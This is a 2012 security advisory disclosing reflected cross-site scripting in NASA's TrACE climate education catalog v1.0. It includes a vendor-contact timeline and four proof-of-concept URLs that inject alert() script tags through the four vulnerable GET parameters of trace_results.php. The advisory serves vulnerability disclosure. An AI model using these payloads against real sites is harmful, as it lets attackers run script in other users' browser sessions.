NASA Tri-Agency Climate Education (TrACE) 1.0 XSS

2012-10-26T00:00:00
ID PACKETSTORM:117692
Type packetstorm
Reporter LiquidWorm
Modified 2012-10-26T00:00:00

Description

                                        
                                            `  
NASA Tri-Agency Climate Education (TrACE) v1.0 Multiple XSS Vulnerabilities  
  
  
Vendor: NASA  
Product web page: http://www.nasa.gov  
Affected version: 1.0  
  
Summary: The Tri-Agency Climate Education (TrACE) Catalog provides search and  
browse access to a catalog of educational products and resources. TrACE focuses  
on climate education resources that have been developed by initiatives funded  
through NASA, NOAA, and NSF, comprising a tri-agency collaboration around  
climate education.  
  
Desc: The application suffers from a reflected cross-site scripting vulnerability  
when input is passed to the 'product_id', 'pi', 'project_id' and 'funder' GET parameters  
in 'trace_results.php' script which is not properly sanitised before being returned  
to the user. This can be exploited to execute arbitrary HTML and script code in a  
user's browser session in context of an affected site.  
  
Tested on: Apache/2.2.21  
PHP 5.2.17  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
Zero Science Lab - http://www.zeroscience.mk  
  
  
Vendor status:  
  
[03.10.2012] Vulnerabilities discovered.  
[03.10.2012] Initial contact with the vendor.  
[04.10.2012] No reply from vendor.  
[05.10.2012] Tried contacting the vendor again.  
[12.10.2012] No reply from vendor.  
[13.10.2012] Last try contacting the vendor.  
[15.10.2012] Vendor replies stating that the problem is solved?!  
[16.10.2012] Replied to vendor that no problems are solved because no details were sent nor problems explained.  
[17.10.2012] Vendor decides to talk serious and asks for details, cynically.  
[18.10.2012] Sent detailed information and PoC files to the vendor.  
[22.10.2012] Asked vendor for status report.  
[22.10.2012] No reply from vendor.  
[23.10.2012] Vendor silently patches the application (v2.0).  
[23.10.2012] Asked vendor to have proper communication.  
[25.10.2012] No reply from vendor.  
[25.10.2012] Pointed out to the vendor about disclosure policy and ethical communication.  
[26.10.2012] Public security advisory released.  
  
  
Advisory ID: ZSL-2012-5111  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php  
  
  
  
03.10.2012  
  
  
  
PoC:  
----  
  
  
- https://www.example.com/trace/trace_results.php?product_id=117"><script>alert(1);</script>&project_id=40&funder=31&pi=43  
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40"><script>alert(2);</script>&funder=31&pi=43  
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31"><script>alert(3);</script>&pi=43  
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31&pi=43"><script>alert(4);</script>  
`